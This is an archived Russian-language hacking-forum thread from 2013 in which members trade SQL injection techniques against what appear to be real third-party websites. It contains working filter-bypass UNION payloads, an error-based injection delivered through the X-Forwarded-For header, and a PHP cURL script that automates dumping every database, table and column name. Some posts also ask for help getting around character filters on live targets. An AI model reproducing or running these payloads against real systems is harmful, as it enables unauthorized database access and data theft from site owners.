ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.09.2013, 17:04
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от YaBtr
Крутите,как слепую:
Легче крутить с использованием вывода, второе и третье поля принтабельны:
Код:
1329876958'+/*!%0Dunion%0Dselect%0D*FROM(select 1) a1 join (select version()) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11*/+--+
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Используем комментарий для обхода одного фильтра[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]/*!КОД*/
[/COLOR][COLOR="#0000BB"]Символ переноса для второго[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]/*!%0Dunion%0Dselect%0D*/
[/COLOR][COLOR="#0000BB"]И для третьего фильтра создаем собственную таблицу через подзапросы[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]псевдонимы и join[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]/*!%0Dunion%0Dselect%0D*FROM(select 1) a1 join (select version()) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11*/
[/COLOR][/COLOR]
|
|
|
19.09.2013, 10:43
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Always
http://site.ru/works/247964/
Host: obshelit.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
x-forwarded-for:1"/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/count(*)/**/from/**/information_schema.tables/**/limit/**/50,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://site.ru/works/248095/
Начинаю перебирать лимит, все перестает отображаться...в чем проблема?
Вы что, в count(*) лимит перебираете? Работает, пример вывода таблиц с колонками:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]"http://site.ru/works/247964/"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]True[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]CURLOPT_ENCODING[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'gzip, deflate'[/COLOR][COLOR="#007700"],
));
for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]+=[/COLOR][COLOR="#0000BB"]64[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]//$main = 'version()';
[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'MID(CONCAT(@p:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE TABLE_SCHEMA !=0x696e666f726d6174696f6e5f736368656d61 and @p:= CONCAT(@p,0x3B, TABLE_SCHEMA,0x3A,TABLE_NAME, 0x3A,COLUMN_NAME) ),@p),5)'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'1"or 1 group by concat( mid(('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$main[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'),'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]',64), floor(rand(0)*2)) having min(0) or 1 #'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/**/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPHEADER[/COLOR][COLOR="#007700"], array([/COLOR][COLOR="#DD0000"]"x-forwarded-for: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Duplicate entry \''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$resp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]64[/COLOR][COLOR="#007700"]));
}
[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Выход: Ctrl+C. Запуск в консоли.
|
|
|
|
21.09.2013, 11:07
|
|
Новичок
Регистрация: 04.01.2010
Сообщений: 24
Провел на форуме:
174204
Репутация:
24
|
|
Ошибка
Ошибка при попытке подключиться к information_schema.tables
+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,1 6+from+information_schema.tables/*
Query Failed: Can't read dir of './test/' (errno: 13)
Query:Select a.*, b.image_filename, b.image_width, b.image_height from AMJ_Article a left join AMJ_Article_Image b on (a.article_id = b.article_id and b.image_main = 1) where a.article_type = 'TRENDS' and a.article_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables/*
Что это значит?
версия 5.0.22
|
|
|
|
21.09.2013, 12:32
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от vsid55
Ошибка при попытке подключиться к information_schema.tables
+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,1 6+from+information_schema.tables/*
Query Failed: Can't read dir of './test/' (errno: 13)
Query:Select a.*, b.image_filename, b.image_width, b.image_height from AMJ_Article a left join AMJ_Article_Image b on (a.article_id = b.article_id and b.image_main = 1) where a.article_type = 'TRENDS' and a.article_id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16 from information_schema.tables/*
Что это значит?
версия 5.0.22
пишет что не может прочитать дерикторрию тест, так как не хватает прав
|
|
|
|
21.09.2013, 16:57
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Добрый день!
при запросе:
?id=-4099+union+select+1,2,3,4,5,@@version,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--
версия выводится замечательно, но если мы заменим @@version на version(), то откроется просто белая страница, сервер фильтрует круглые скобки, невозможно обратиться ни к одной функции из-за этого. Как можно обойти данную проблему?
|
|
|
|
22.09.2013, 02:35
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Сообщение от OxoTnik
захексить весь запрос
-4099+0x756E696F6E2B73656C6563742B312C322C332C342C3 52C404076657273696F6E2C372C382C392C31302C31312C313 22C31332C31342C31352C31362C31372C31382C31392C32302 C32312C32322C32332C32342C32352C32362C32372C32382C3 2392C33302C33312C33322C3333
Ничего не дало.
|
|
|
|
22.09.2013, 04:34
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Version () захекси, а не всю адресную строку.
|
|
|
|
22.09.2013, 07:47
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от cipa21
Добрый день!
при запросе:
?id=-4099+union+select+1,2,3,4,5,@@version,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33--
версия выводится замечательно, но если мы заменим @@version на version(), то откроется просто белая страница, сервер фильтрует круглые скобки, невозможно обратиться ни к одной функции из-за этого. Как можно обойти данную проблему?
Сообщение от OxoTnik
захексить весь запрос
Сообщение от kingbeef
Version () захекси, а не всю адресную строку.
В MySQL хекс используется только для строк. Захексить функцию, или весь запрос вам не удастся.
|
|
|
|
26.09.2013, 06:51
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
Провел на форуме:
17560
Репутация:
0
|
|
http://np.com.ua/search.html?keywords=1'+order+by+2+--+
http://np.com.ua/search.html?keywords=1'+union+SELECT+1,2+--+
Как быть?
|
|
|
|
26.09.2013, 18:03
|
|
Участник форума
Регистрация: 17.08.2011
Сообщений: 131
Провел на форуме:
49472
Репутация:
0
|
|
Инъекция в MSSQL, фильтрация всех спецсимволов - (),;`"':[]@ hex не помогает, подсказки есть?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
